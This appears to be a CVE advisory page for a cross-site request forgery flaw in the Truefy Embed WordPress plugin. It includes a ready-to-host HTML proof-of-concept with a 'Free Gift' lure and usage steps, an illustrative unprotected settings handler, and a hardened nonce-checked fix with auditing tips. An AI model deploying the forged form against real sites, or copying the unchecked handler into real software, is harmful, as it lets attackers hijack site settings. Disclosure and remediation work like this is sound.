Security Vulnerability Report
CVE-2025-14161 CVSS 4.3 MEDIUM

CVE-2025-14161

Published: 2025-12-12 04:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Truefy Embed plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the 'truefy_embed_options_update' settings update action. This makes it possible for unauthenticated attackers to update the plugin's settings, including the API key, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this entry. Affected product, as stated in the description:

Truefy Embed plugin for WordPress <= 1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-14161: Truefy Embed Plugin Settings Update -->
<!-- This PoC demonstrates how an attacker can forge a settings update request -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF Attack PoC - CVE-2025-14161</title>
</head>
<body>
  <h1>CSRF PoC for Truefy Embed Plugin</h1>
  <p>Click the button below to trigger the forged request:</p>

  <!-- Auto-submit form targeting the vulnerable endpoint -->
  <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;">
    <!-- Required hidden fields for WordPress admin-post handler -->
    <input type="hidden" name="action" value="truefy_embed_options_update">
    <!-- Missing or bypassed nonce validation - attacker does not need valid nonce -->
    <input type="hidden" name="_wpnonce" value="attacker_forged_or_missing">
    <!-- Plugin settings that can be modified -->
    <input type="hidden" name="truefy_api_key" value="attacker_controlled_api_key">
    <input type="hidden" name="truefy_embed_options[api_key]" value="malicious_key_123">
    <input type="hidden" name="truefy_embed_options[settings_updated]" value="1">
    <!-- Additional settings fields -->
    <input type="hidden" name="truefy_embed_options[enable_logging]" value="1">
    <input type="hidden" name="truefy_embed_options[cache_duration]" value="0">
  </form>

  <button type="button" onclick="document.getElementById('csrfForm').submit();">Click Here for Free Gift!</button>

  <script>
    // Auto-submit on page load (for more stealthy attack)
    // Uncomment the line below for automatic exploitation
    // window.onload = function() { document.getElementById('csrfForm').submit(); };
    console.log('CSRF PoC loaded - waiting for user interaction');
  </script>
</body>
</html>
<!--
Usage:
1. Host this HTML file on attacker's server
2. Trick WordPress admin into visiting this page
3. When admin clicks the button (or page auto-submits), the forged request is sent
4. The request carries admin's valid session cookies
5. Server processes request without proper nonce validation
6. Attacker's malicious API key is saved to plugin settings
Note: This PoC is for educational and security testing purposes only.
-->
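The root cause named in the description is a settings handler that trusts any POST carrying the administrator's session cookie. The following is an added example, not the plugin's own code from truefy.php: a hypothetical admin-post handler for the 'truefy_embed_options_update' action, shown first in the unchecked form that the CWE-352 pattern describes and then hardened with the WordPress nonce and capability checks that close it. The option name, the nonce field name '_truefy_nonce', the settings page slug and the helper function names are assumptions; only the action name comes from the CVE.

```php
<?php
// Added example (not the Truefy Embed plugin's code). Shows the unchecked
// settings handler pattern described in CVE-2025-14161 beside a hardened one.
// Option/field/page names below are assumptions; the action name is from the CVE.

// --- Vulnerable pattern (illustrative): every POST that reaches admin-post.php
// with a logged-in admin's cookies is honored, so a form submitted from an
// attacker-controlled page is indistinguishable from the real settings form.
function truefy_embed_options_update_vulnerable() {
    $raw     = isset( $_POST['truefy_embed_options'] ) ? (array) $_POST['truefy_embed_options'] : array();
    $options = array( 'api_key' => isset( $raw['api_key'] ) ? $raw['api_key'] : '' );
    update_option( 'truefy_embed_options', $options );   // stored without any origin or permission check
    wp_safe_redirect( admin_url( 'options-general.php?page=truefy-embed' ) );
    exit;
}

// --- Hardened handler: the nonce binds the request to this action, this user and
// this session (WordPress nonces rotate roughly every 12-24 hours), so a cross-site
// form cannot carry a valid one; the capability check adds an authorization layer.
function truefy_embed_options_update_hardened() {
    // check_admin_referer() terminates with a 403 if the nonce is absent or invalid.
    check_admin_referer( 'truefy_embed_options_update', '_truefy_nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    $raw = ( isset( $_POST['truefy_embed_options'] ) && is_array( $_POST['truefy_embed_options'] ) )
        ? wp_unslash( $_POST['truefy_embed_options'] )
        : array();

    // Whitelist and sanitize the fields that may be stored; unknown keys are dropped.
    $options = array(
        'api_key' => isset( $raw['api_key'] ) ? sanitize_text_field( $raw['api_key'] ) : '',
    );
    update_option( 'truefy_embed_options', $options );

    wp_safe_redirect(
        add_query_arg( 'settings-updated', '1', admin_url( 'options-general.php?page=truefy-embed' ) )
    );
    exit;
}
add_action( 'admin_post_truefy_embed_options_update', 'truefy_embed_options_update_hardened' );

// The legitimate settings form must emit the matching nonce field, otherwise the
// hardened handler rejects real submissions too.
function truefy_embed_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="truefy_embed_options_update">
        <?php wp_nonce_field( 'truefy_embed_options_update', '_truefy_nonce' ); ?>
        <label>API key <input type="text" name="truefy_embed_options[api_key]"></label>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}
```

Two practical notes for reviewers of similar handlers: a nonce check alone is not an authorization check, which is why `current_user_can()` is kept even though only administrators normally reach the page; and when auditing a site that ran the affected versions, an unexpected change to the stored API key (for example via the `update_option` / `updated_option` hooks or an options-table diff) is the observable artifact of this issue, since the forged request itself looks like a normal admin save.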

References

https://plugins.trac.wordpress.org/browser/truefy-embed/tags/1.1.0/truefy.php#L431
https://plugins.trac.wordpress.org/browser/truefy-embed/trunk/truefy.php#L431
https://www.wordfence.com/threat-intel/vulnerabilities/id/74ad664d-5cfa-481c-a318-30999c43e4ac?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14161", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:48.770", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Truefy Embed plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the 'truefy_embed_options_update' settings update action. This makes it possible for unauthenticated attackers to update the plugin's settings, including the API key, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/truefy-embed/tags/1.1.0/truefy.php#L431", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/truefy-embed/trunk/truefy.php#L431", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/74ad664d-5cfa-481c-a318-30999c43e4ac?source=cve", "source": "[email protected]"}]}}